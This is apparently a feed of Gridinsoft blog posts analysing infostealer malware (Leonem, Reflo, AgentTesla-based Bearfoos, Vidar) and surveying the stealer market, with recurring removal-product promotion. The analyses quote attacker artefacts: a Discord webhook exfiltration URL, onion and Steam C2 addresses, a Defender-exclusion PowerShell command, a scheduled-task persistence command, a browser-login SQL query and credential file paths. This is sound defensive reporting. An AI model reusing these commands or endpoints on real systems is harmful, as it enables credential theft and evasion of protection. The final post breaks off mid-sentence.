Spyware Archives – Gridinsoft Blog Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Wed, 11 Sep 2024 13:37:54 +0000 en-US hourly 1 https://wordpress.org/?v=77528 200474804 Trojan:Win32/Leonem https://gridinsoft.com/blogs/trojan-win32-leonem/ https://gridinsoft.com/blogs/trojan-win32-leonem/#respond Wed, 11 Sep 2024 13:37:54 +0000 https://gridinsoft.com/blogs/?p=26937 Trojan:Win32/Leonem is a spyware that targets any login data on a compromised system, including saved data in browsers and email clients. It primarily spreads through malicious documents or disguised as legitimate software. Trojan:Win32/Leonem Overview Trojan:Win32/Leonem is the detection name used by Microsoft Defender to identify spyware. It’s a classic example of this malware type, which… Continue reading Trojan:Win32/Leonem

The post Trojan:Win32/Leonem appeared first on Gridinsoft Blog.

]]>
Trojan:Win32/Leonem is a spyware that targets any login data on a compromised system, including saved data in browsers and email clients. It primarily spreads through malicious documents or disguised as legitimate software.

Trojan:Win32/Leonem Overview

Trojan:Win32/Leonem is the detection name used by Microsoft Defender to identify spyware. It’s a classic example of this malware type, which aims at stealing sensitive information from a victim’s system. In addition to its main function, it can also operate as a malware dropper, i.e. deliver other malware. In terms of its core functionality, Leonem can carry out activities like keylogging and collecting sensitive data (logins, browser passwords, browser history, cookies, cache, etc.). It also seeks other stored login credentials, stored in the compromised system, including those in email clients.

Trojan:Win32/Leonem detection popup screenshot
Trojan:Win32/Leonem detection popup

As for the payload, Leonem Trojan is capable of downloading additional malicious components. Most often, it deploys ransomware and backdoors, though its capabilities are not limited to these threats. This malware typically spreads through malicious attachments in phishing emails or bundled add-ons with legitimate software from untrustworthy sources. Once launched on the system, Trojan:Win32/Leonem attempts to disable security software and modify system settings to ensure persistence by running each time the operating system boots.

Technical Analysis

Let’s now take a deeper analysis of the threat on an infected system. Since it is a classic information stealer, it has a rather predictable behavior pattern. The malware’s initial actions focus on detecting sandbox environments, debuggers, or virtual machines. To do this, Leonem leverages the following legitimate processes:

%windir%\System32\svchost.exe -k WerSvcGroup
wmiadap.exe /F /T /R
%windir%\system32\wbem\wmiprvse.exe
"%windir%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Leonem retrieves BIOS information using WMI queries, specifically targeting Win32_Bios and Win32_NetworkAdapter. Additionally, it exploits the aspnet_compiler.exe process and queries hardware properties via WMI. Among other things, it inspects specific registry values and files, including:

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\Levels
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config

In addition to detecting the virtual environment, the malware generates a system fingerprint to uniquely identify the infected system.

Next, the malware assesses the presence and status of installed anti-malware solutions. If Microsoft Defender is enabled on the system, the malware attempts to turn it off. This also allows the malware to establish persistence within the system. For all this, Leonem abuses the following legitimate processes and checks the following key values and system locations:

C:\Windows\system32\services.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\SecurityHealthService.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiVirus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\MpEngine_DisableScriptScanning

Data Collection

After all the checks, Trojan:Win32/Leonem initiates its primary operation: data collection. It gathers passwords and session tokens from browsers, email clients, and other applications that keep auth details locally. In addition, the malware creates a DirectInput object, enabling it to function as a keylogger, i.e. capture all text from the keyboard. It specifically targets the following file path:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\\AppData\Local\360Chrome\Chrome\User Data
C:\Users\\AppData\Local\Chromium\User Data
C:\Users\\AppData\Local\Mailbird\Store\Store.db
C:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
C:\Users\\AppData\Local\Microsoft\Edge\User Data\Login Data
C:\Users\\AppData\Local\Tencent\QQBrowser\User Data\Default\EncryptedStorage

C:\Users\\AppData\Local\Torch\User Data
C:\Users\\AppData\Local\UCBrowser\
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\logins.json
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\signons.sqlite
C:\Users\\AppData\Roaming\Mozilla\Firefox\profiles.ini
C:\Users\\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini
C:\Users\\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\\AppData\Roaming\Thunderbird\profiles.ini

Leonem collects data both in plain text and in the form of a hash.

Data Exfiltration

At the final stage of the attack, Trojan:Win32/Leonem sends the gathered data to its command server. The reviewed sample uses Discord webhook for this purpose. Beforehand, the malware sets up TCP connections on ports 443 and 80. This confirms that it attempts to communicate with remote servers to transmit information or receive commands. Below are some of the requests sent to the said webhooks.

POST https://discord.com:443/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 200
POST https://discord.com/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 404

The 200 status at the end means that the request was successfully completed, and the 404 on the other hand indicates an error. This likely indicates that the webhook has either been deleted or changed. In addition, the malware utilizes the ip-api.com service to retrieve details about the hosting environment where it is executed. In this way, it tries to determine whether it is running on the server used for hosting or on a regular computer.

How To Remove Trojan:Win32/Leonem?

As we can see, Trojan:Win32/Leonem is a rather serious threat that deactivates Microsoft Defender whenever possible. Therefore, to effectively remove this Trojan, it’s recommended to use a reliable third-party anti-malware solution like GridinSoft Anti-Malware. To eliminate Trojan:Win32/Leonem from your system, follow these steps:

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

The post Trojan:Win32/Leonem appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojan-win32-leonem/feed/ 0 26937
Trojan:Win64/Reflo.HNS!MTB https://gridinsoft.com/blogs/trojan-win64-reflo-hns-mtb/ https://gridinsoft.com/blogs/trojan-win64-reflo-hns-mtb/#respond Tue, 03 Sep 2024 21:42:03 +0000 https://gridinsoft.com/blogs/?p=26853 Win64/Reflo.HNS!MTB is a detection of a malware sample that aims at stealing confidential information. It usually spreads through game mods and works as quietly as possible. That virus may belong to any malware family, as it is a behavioral detection of a specific action that it does in the system. Win64/Reflo.HNS!MTB Overview Trojan:Win64/Reflo.HNS!MTB is a… Continue reading Trojan:Win64/Reflo.HNS!MTB

The post Trojan:Win64/Reflo.HNS!MTB appeared first on Gridinsoft Blog.

]]>
Win64/Reflo.HNS!MTB is a detection of a malware sample that aims at stealing confidential information. It usually spreads through game mods and works as quietly as possible. That virus may belong to any malware family, as it is a behavioral detection of a specific action that it does in the system.

Win64/Reflo.HNS!MTB Overview

Trojan:Win64/Reflo.HNS!MTB is a heuristic detection used by Microsoft Defender to detect a specific type of malware. This malware is a type of spyware and can actively collect sensitive information, such as user credentials, from the victim’s system. Heuristic detection is used when malware has certain characteristics and behavioral patterns that match known threats, but it may not have a matching signature in the antivirus database.

Win64/Reflo.HNS!MTB detection popup screenshot
Win64/Reflo.HNS!MTB detection popup

After the execution, Reflo Trojan will start its malicious activity immediately, with the primary goal of stealing confidential information. This can end up with your social media accounts to start sending spam messages, and banking accounts being drained. This type of malware is designed to operate stealthily, so its presence is usually difficult to detect. In most cases, the victim only discovers it when significant damage has already been done, such as aforementioned unauthorized access to online accounts.

As with most similar threats, Trojan:Win64/Reflo.HNS!MTB is often spread via pirated software. Repackers, modders, and websites that distribute pirated games, cracked programs, or mods may add it as a hidden addition to their repacks. It can also spread through email attachments, malicious links, or accidental downloads on compromised websites. However, the main source of this threat is questionable game mods.

Technical Analysis

Now let’s see how this malware behaves on a compromised system. As mentioned earlier, this virus is mainly distributed via game mods. This suggests that any detections might be false positives by default. Although the user won’t notice anything visually, clicking “allow” triggers certain processes in the system.

The process begins with the following command:

"C:\Windows\system32\cmd.exe" /c "cd ^"C:\Users\\AppData\Local\Temp^" && start /wait ^"^" ^"C:\Users\\AppData\Local\Temp\Appname/Setup.bat^"
C:\Windows\system32\cmd.exe /K "C:\Users\\AppData\Local\Temp\Appname/Setup.bat
python Setup.py

Next, the malware checks for the presence of a sandbox or virtual environment and fingerprints the system. To do this, it checks the following registry keys:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ActiveComputerName

This is a standard procedure for malware that prevents the threat from running in a virtual environment. In addition, Trojan:Win64/Reflo.HNS!MTB uses some tricks to prevent dynamic analysis.

Payload

The following commands are used by the Reflo Trojan to drop and unpack the payload:

"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\RedTiger-Tools-main.zip"
7620 - C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\cjov35ys.mq0" "C:\Users\user\Desktop\Appname.zip"
7660 - C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

The malware drops many files into the Windows temporary directory C:\Users\user\AppData\Local\Temp\, including many “.py” files that are necessary for the malware to work.

Credential Access

The next step is to collect confidential information. This is done by creating a DirectInput object that enables the malware to read keystrokes. In this way, attackers can intercept usernames and passwords that the victim enters on their device. Once the user authorizes the execution of this threat, it can run in the background for an extended period. The malware is extremely stealthy, and the name of the executable can be random. Therefore, the user is unlikely to realize why they can no longer log into their account.

Besides keylogging, the hijacker also collects confidential data already stored on the system. Among other things, the malware can collect cookies, saved passwords, and credit card information from autocomplete forms in popular browsers. Even though the latest versions of browsers encrypt this information in encrypted form, it does not protect it completely. The malware can also collect cookies, saved passwords, and credit card information from autocomplete forms in popular browsers. Typically, the query looks like this:

SELECT action_url, username_value, password_value FROM logins

Almost always, infostealer malware like Reflo.HNS!MTB targets the most popular web browsers. Chrome, Chromium, Opera, Firefox and some of the popular alternatives to the mainstream applications are among the target list. Still, using the no-name browser won’t always secure you: malware masters can easily adjust the list of applications their virus will extract credentials from.

C2 Connection

The malware communicates with multiple addresses on the internet, but certain addresses are of particular interest. Specifically, it attempts to connect to .onion addresses, which are associated with the Darknet. Our instance is trying to connect to:

3bp7szl6ehbrnitmbyxzvcm3ieu7ba2kys64oecf4g2b65mcgbafzgqd.onion
55niksbd22qqaedkw36qw4cpofmbxdtbwonxam7ov2ga62zqbhgty3yd.onion
7mejofwihleuugda5kfnr7tupvfbaqntjqnfxc4hwmozlcmj2cey3hqd.onion
ajlu6mrc7lwulwakojrgvvtarotvkvxqosb4psxljgobjhureve4kdqd.onion

These are just a few of the addresses, but in addition to darknet sites, the malware tries to connect to URLs related to Discord, Telegram, Mastodon or similar social networks. That tactic allows frauds to mask the final command servers, as the corresponding user profiles will contain nothing but the link to the “main” C2.

How To Remove Trojan:Win64/Reflo.HNS!MTB?

To remove Trojan:Win64/Reflo.HNS!MTB, it’s essential to use an advanced anti-malware solution. I recommend GridinSoft Anti-Malware, as it can offer permanent protection against most threats in addition to cleaning. The first step is to scan your system and remove all detected threats. To do this, follow the instructions below:

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

After removing the threats, be sure to change your account passwords and terminate any suspicious sessions. This step is crucial to prevent attackers from regaining access to compromised accounts.

The post Trojan:Win64/Reflo.HNS!MTB appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojan-win64-reflo-hns-mtb/feed/ 0 26853
Trojan:Win32/Bearfoos.B!ml https://gridinsoft.com/blogs/trojan-win32-bearfoos-bml/ https://gridinsoft.com/blogs/trojan-win32-bearfoos-bml/#respond Sat, 13 Jul 2024 12:31:59 +0000 https://gridinsoft.com/blogs/?p=25679 Trojan:Win32/Bearfoos.B!ml is a detection of Microsoft Defender associated with data stealing malware. It may flag this malware due to the specific behavior patterns, assigning that name even to malicious programs of well-known families. As the Defender uses machine learning for this detection, it can sometimes be a false positive. Trojan:Win32/Bearfoos.B!ml Overview Trojan:Win32/Bearfoos.B!ml is a detection… Continue reading Trojan:Win32/Bearfoos.B!ml

The post Trojan:Win32/Bearfoos.B!ml appeared first on Gridinsoft Blog.

]]>
Trojan:Win32/Bearfoos.B!ml is a detection of Microsoft Defender associated with data stealing malware. It may flag this malware due to the specific behavior patterns, assigning that name even to malicious programs of well-known families. As the Defender uses machine learning for this detection, it can sometimes be a false positive.

Trojan:Win32/Bearfoos.B!ml Overview

Trojan:Win32/Bearfoos.B!ml is a detection of Microsoft Defender AI system for infostealer malware and spyware. Typically, the malware this detection flags belongs to a broader family, but may as well mean a small-batch virus. Reason for the detection is a specific behavior pattern that the AI system has spotted, which means it is not really clear what exactly caused it. Bearfoos embeds itself deeply into the system, often unnoticed by the user. It targets cookies, password databases, cryptocurrency wallets, and other sensitive information stored on the infected system.

Trojan:Win32/Bearfoos.B!ml detection
Trojan:Win32/Bearfoos.B!ml detection

Once the data is collected, the malware transmits it to a command-and-control server, then enters a dormant state, waiting for further commands. This allows it to remain undetected for extended periods. In addition to data theft, Bearfoos can log keystrokes, take screenshots, record video or audio using the system’s peripherals, and perform other spying activities.

Trojan:Win32/Bearfoos.B!ml spreads using methods typical for this type of malware. Most commonly, it is distributed through game cheats, mods, and dubious utilities. The second most common method of distribution is email spam.

Technical Analysis

Let’s break down how Trojan:Win32/Bearfoos.B!ml behaves in an infected system. The particular sample that I review appears to be an offshoot of AgentTesla spyware. I’ll try to explain the most important aspects of this threat as clearly as possible.

Upon infiltrating the system, the malware performs checks in the following locations for the presence of sandboxes and debuggers. This is a typical step that malware does to avoid analysis and “useless” infections.

C:\drivers\etc\hosts
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\system32\VERSION.dll

Gaining Persistence

After that, it drops its own copy to the AppData/Roaming folder and assigns it a random name. In my case, it was vzCravLx.exe. Next, the malware checks Microsoft Defender settings:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus

These registry values pertain to various components of the system’s anti-malware protection settings. The malware checks these settings to understand the system’s security posture and plan further actions. In our scenario, when the Defender settings were not altered by default, Bearfoos proceeded to alter Defender. It executes this selection of commands:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\\AppData\Roaming\vzCravLx.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vzCravLx" /XML "C:\Users\\AppData\Local\Temp\tmp6EAE.tmp

This is what provides persistence to the malware. With the first command, it excludes the path to its own executable and from Microsoft Defender scanning. The second command calls for the creation of a task in Task Scheduler to run the malware every once in a while. After that, Bearfoos a.k.a AgentTesla deletes the original file and keeps operating only with these protected duplicates.

Data Collection

The next phase involves the collection of sensitive information. First of all, the malware checks a selection of files that belong to web browsers, seeking for passwords, cookies and session tokens. Here is the list of browsers in question:

  • 360Chrome
  • Microsoft Edge
  • 7Star
  • Amigo
  • Brave Browser
  • Citrio
  • CentBrowser
  • Chedot
  • Chromium
  • Orbitum
  • CocCoc Browser
  • Comodo Dragon
  • Coowon
  • Elements Browser
  • Epic Privacy Browser
  • Sleipnir5 (Fenrir Inc)
  • Iridium
  • Kometa
  • ChromePlus (MapleStudio)

As we can see, these locations mainly consist of user data from Chromium-based web browsers. Aside from them, malware crawls credentials from desktop mailing clients and some FTP/VPN applications.

Command & Control Server

The Bearfoos trojan sends HTTP requests to the following addresses to download various files, including a CAB file from the Windows Update server and certificates from Sectigo and Microsoft:

GET http://download.windowsupdate.com/d/msdownload/update/others/2015/05/17930914_a3b333eff1f0428f5a2c87724c542504821cdbd8.cab
GET http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt 200
GET http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c 200
GET http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt 200
GET http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt 200

These requests might be attempts to disguise malicious activity as legitimate actions. The malware also resolves DNS names for several domains, including the legitimate download.windowsupdate.com, and potentially suspicious domains such as mail.commtechtrading[.]com and chir104.websitehostserver[.]net. These latter domains could be part of its command-and-control (C2) infrastructure used for data exfiltration. The malware establishes the following TCP/UDP connections with various IP addresses:

TCP 23.53.122.213:80
TCP 173.236.63.6:587
TCP 20.99.133.109:443
TCP 23.216.147.71:80
TCP 23.216.81.152:80
UDP 192.168.0.12:137

After completing the data exfiltration, the malware enters a waiting mode, listening for commands from the C2 server. During this standby period, it continues to collect data, capturing keystrokes, taking screenshots, and recording audio and video from peripheral devices.

Is Trojan:Win32/Bearfoos.B!ml a False Positive?

As I mentioned earlier, the detection of Trojan:Win32/Bearfoos.B!ml is performed using Microsoft Defender’s AI-based system. However, this method is prone to false positives, and legitimate files, such as those associated with recently updated games or programs, are often mistakenly flagged as malicious. In particular, it is often to see false positives in small-batch programs from GitHub, certain emulator apps, and in some bizarre cases even own Windows files.

While it is easy to spot a false positive with a program that you know and trust, doing so with a less familiar app may be problematic. If you are not sure about the source and developer, bold guessing may be a particularly destructive practice. That is why a second opinion anti-malware scan is needed.

How to Remove Trojan:Win32/Bearfoos.B!ml?

To remove Bearfoos.B!ml trojan or check whether it is a real detection, I recommend using GridinSoft Anti-Malware. This program is not vulnerable to malware attacks as Microsoft Defender, and will easily spot even the most recent malware samples, thanks to its multi-component detection system. Follow the guide below to get your system as good as new.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

The post Trojan:Win32/Bearfoos.B!ml appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojan-win32-bearfoos-bml/feed/ 0 25679
What is Infostealer Malware? Top 5 Stealers in 2024 https://gridinsoft.com/blogs/infostealer-malware-top/ https://gridinsoft.com/blogs/infostealer-malware-top/#respond Wed, 19 Jun 2024 13:16:29 +0000 https://gridinsoft.com/blogs/?p=14520 The Cybercrime world changes rapidly – both by expanding, collapsing, and evolving extensively and intensively. One of the most massive malware types in the modern threat landscape – Infostealer Malware – appears to enter a new stage of development. Though its major names remain the same, some new malware families with promising features popped out.… Continue reading What is Infostealer Malware? Top 5 Stealers in 2024

The post What is Infostealer Malware? Top 5 Stealers in 2024 appeared first on Gridinsoft Blog.

]]>
The Cybercrime world changes rapidly – both by expanding, collapsing, and evolving extensively and intensively. One of the most massive malware types in the modern threat landscape – Infostealer Malware – appears to enter a new stage of development. Though its major names remain the same, some new malware families with promising features popped out. Let’s have a peek at all of them and see what to expect.

Infostealer Malware Market in 2024

Infostealer malware gained more and more popularity during the last decade. However, the biggest spike happened during the last few years. The first noticeable factor is the massive popularisation of cryptocurrencies. How is that related? Well, relatively big amounts of money always attracted the attention of hackers. Carding and banking fraud though is now less effective as banks implemented strict controlling measures back in the early ‘10s. Cryptocurrency wallets, on the other hand, have low to no control, making them ideal targets for Infostealer.

Infostealer Malware stats

Another reason that made spyware and infostealers so popular and widespread is their massive application in attacks on corporations. Even when hackers break into the network to cipher the files and ask for a ransom for their decryption, they also drop an Infostealer malware that will exfiltrate as much valuable information as possible. Afterwards, hackers request an additional ransom to keep this data secret. Some attacks are based exclusively on stealers, and the result of their job is both sold on the Darknet or used for business email compromise (BEC) attacks. Additionally, some ransomware groups that aim at home users started adding spyware to their attack chain a while ago.

Infostealer Malware Market Leaders

As of May 2024, 3 major malware families dominate the market – RedLine, Raccoon, and Vidar. All of them are not new at that point of time, with Vidar being active for the longest time. Let’s have a closer look at them, starting with the youngest one.

RedLine Infostealer

RedLine infostealer appeared in 2020, and saw a pretty wide application in different cyberattacks. Most of the time, however, it was aimed against single users, as its functionality fits best for this purpose. Key targets for the RedLine are cryptocurrency wallet data, both from desktop versions and browser plugins. Still, it can gather other data, like FTP/VPN configurations and session tokens for apps like Discord or Steam. Having a pretty large market share at the edge of 2024, it became much less active starting from March 2024. Yet an enormous number of new samples that popped out recently may be the sign of another campaign getting ready. The RedLine developers find hackers who buy this malware is through Telegram groups and Darknet forums.

Redline promotion in Telegram
Telegram group post that advertises Redline malware

Raccoon Infostealer

Raccoon has key properties similar to ones RedLine offers, but is capable of capturing a much wider selection of data. In its scope are browser autofill files, cookies, and online banking credentials, on top of the ability to pluck cryptocurrency wallets. Since the emergence in early 2019, Raccoon was holding dominant positions on the market – and keeps holding them even now. In the summer 2022, its developers released a new version, promising faster and more reliable malware for a slightly bigger pay. Same as RedLine, Raccoon stealer is commonly spread through ads in Telegram channels and bots; Darknet platforms are less preferred, though are used for public communication.

Raccoon stealer admin panel
Admin panel of Raccoon stealer

Vidar Infostealer

Among top 3 Infostealer threats, Vidar is most definitely a dark horse. It is considered to be an offspring of Arkei stealer, malware that made quite an image back in early 10’s. After the launch in 2018, it never had a dominant share on the market, being at best #2. Nonetheless, its efficiency and unique design is hard to deny – Vidar offers a modular approach towards data stealing and has an uncommon way of C2 communication. It also performs self-destruction after the successful data exfiltration. Additionally, it is often spread in a bundle with other malware, such as STOP/Djvu ransomware. Methods of selling it to cybercriminals, however, are less unique – it uses Telegram channels dedicated to malware promotion.

Newbies

It would be quite reckless to deny the importance of new malware. For sure, not all of them will make it even to the 1-year milestone, but Raccoon and Vidar once were newbies as well – and you can see where they are. Among stealer families that popped out over the last year, there are a couple you should keep in mind.

Lumma

Also known as LummaC2, this infostealer appeared in December 2022. At the outset of familiarity with this malware, you can already see some fairly noteworthy details. At the “pricing plans” panel, developers mention the ability to configure the payload in a specific manner, and add network sniffer functionality. The presence of these functions depends on the price of the chosen plan – $250, $500 or $1,000. Additionally, masters offer access to malware and panel source codes and the right to sell them – for $20,000. Other functions, however, are available regardless of the plan. Lumma can grab browser cookies, autofill forms, data from 2FA plugins/apps, and crypto wallets credentials – from both apps and browser plugins.

Lumma infostealer pricing
Pricings for different LummaC2 stealer plans, posted on the Darknet website

Stealc

Stealc is another youngster, which was first mentioned on January 9, 2023, on several Darknet forums. It appears to utilise best practices from most popular stealers, which already makes it pretty potent. Among unusual practices is a free test and weekly releases of new features. As for other functions, malware has a classic set of a modern infostealer: it gathers data from web browsers (cookies, autofill forms etc), cryptocurrency wallets extensions and even email clients and messengers. Such extended functionality, especially compared to other new malware examples, will definitely be appreciated.

How to Protect Against Infostealer Malware?

Protection against threats like infostealer is always a tough question to answer. Thing is, malware like this is forced to evolve constantly, finding new ways to be more efficient and stealthy. This makes any advice that reacts to some malware features useless in the long-term. However, there are still some things Infostealer Malware developers can’t (or don’t want to) change.

Beware of spear phishing. It may have different forms – from email messages that are sent from a compromised business email to posts in social media from the hijacked account of a legit company. But even after all the sophistications, hackers can never make a check-proof legend. Most commonly, they attract victims by urgent events or exclusive deals. A simple source check will reveal any possible scam – if the impersonated company has nothing to do with such claims, ignore the spooking message.

Avoid using pirated software. Despite losing a significant portion of market share due to email spam expansion, software cracks are still used for malware spreading. Torrent-trackers and third party websites are flooded with numerous offers on a brand new software – and try to guess which one is infected. Using only licensed software will not make you clear before the law, but also nail any risk of malware injection. And, believe me – dealing with malware activity consequences will cost you way more than you can save on program licences.

Protect your system with proper anti-malware software. Yes, it is better to avoid muddy waters at all, but having a security tool that will take care of problems will make your life much easier. Not any utility will fit though, as infostealer malware have some tricks to avoid basic anti-malware software. GridinSoft Anti-Malware gives them no chances, thanks to its three-component detection system and constant updates that retain its databases’ relevance.

What is Infostealer Malware? Top 5 Stealers in 2024

The post What is Infostealer Malware? Top 5 Stealers in 2024 appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/infostealer-malware-top/feed/ 0 14520
Password Stealer https://gridinsoft.com/blogs/password-stealer/ https://gridinsoft.com/blogs/password-stealer/#respond Tue, 28 May 2024 11:04:42 +0000 https://blog.gridinsoft.com/?p=1843 Password stealer is a type of data stealing malware, that aims at a specific category of information. They are often spread through phishing, malvertising, and sometimes in cracked software. Let’s have a more detailed look on how they work, and how to protect yourself against password stealers. What Is a Password Stealer? As its name… Continue reading Password Stealer

The post Password Stealer appeared first on Gridinsoft Blog.

]]>
Password stealer is a type of data stealing malware, that aims at a specific category of information. They are often spread through phishing, malvertising, and sometimes in cracked software. Let’s have a more detailed look on how they work, and how to protect yourself against password stealers.

What Is a Password Stealer?

As its name suggests, password stealer is a type of malware that aims to steal sensitive data. Mainly, this is about credentials to email accounts, social networks, and online banking. But these days, quite a few password stealers incorporate more diverse functionality. They now target crypto wallets, cookies, browser cache and saved passwords, Discord session tokens, and more.

how password stealer works

The primary distribution method of password stealers is phishing emails with malicious attachments. Sometimes, however, password stealers can also be distributed via malicious ads in search results. In a selection of cases, spear phishing was used to attack a specific person with the malware.

Technical Analysis

All stealers are generally very similar, so the properties that the current instance has to apply to the others, perhaps with minimal differences. This will be a rather simplified analysis aimed at understanding how password stealer works. I will get through the most common and important actions that this malware does. For the test sample, I’ve chosen Vidar Stealer – a classic password stealer written in C++. The attack commonly begins when the victim runs an infected file.

Defense Evasion

Like most malware, it has a few tricks that make it particularly difficult to detect on the system. When the malware comes under the guise of the installer of a legitimate program, it can contain a row of null bytes at the beginning, which pushes its size over 700 MB. This size allows it to avoid instant detection by antivirus solutions and online checkers like VirusTotal. Another trick aimed at evading detection is code obfuscation. The malware also checks system parameters to ensure it is not running in a virtualized environment. It checks values such as:

HKLM/System/Setup
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

These keys contain information about the system and hardware, which allows you to create a digital fingerprint of the infected system in addition to identification.

Data Collection

Once the malware is convinced that it is not running in a sandbox and has established a foothold in the system, it moves on to its primary function – information gathering. password stealer collects the following information from browsers:

C:\Users\admin\AppData\Local\Temp\History\History.IE5\index.dat
C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Windows\system32\CRYPTBASE.dll
C:\Documents and Settings\\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004
C:\Users\user\AppData\Local\Google\Chrome\User Data\

These folders contain information such as autofill, saved passwords, cookies, cache, and browser extensions. Next, stealer tries to collect crypto wallet data by checking the locations you can see below. This list includes only a few wallets, as the exact list is too long to mention.

C:\Users\user\AppData\Local\Blockstream\Green\wallets\
C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\

Data Exfiltration

The malware’s final operation step is stolen data exfiltration. To do this, password stealer communicates with C2 (Command and Control) to receive further instructions. By the way, there can be various options for communicating with C2. Attackers often still use classic C2 servers; sometimes, they use Telegram or Mastodon as intermediate servers. However, in our case, the malware uses Steam. Before sending the stolen data, stealer sends several requests, including:

GET https://steamcommunity.com/profiles/76561199548518734 200

This is a link to a Steam profile. However, the strange name profile’s name “sppmon http://195.201.131.165|” is the command for malware. This is actually the address of the final server that the stealer should connect to. The phrase “This user has also played as” suggests that the address in the name changes quite often.

Steam profile screenshot
Steam profile as intermediate server

When finished, stealer self-deletes itself and covers its tracks. Though, not all infostealers do this, preferring to stay in the system even after extracting all the data. But when they do, the shell command comes in handy:

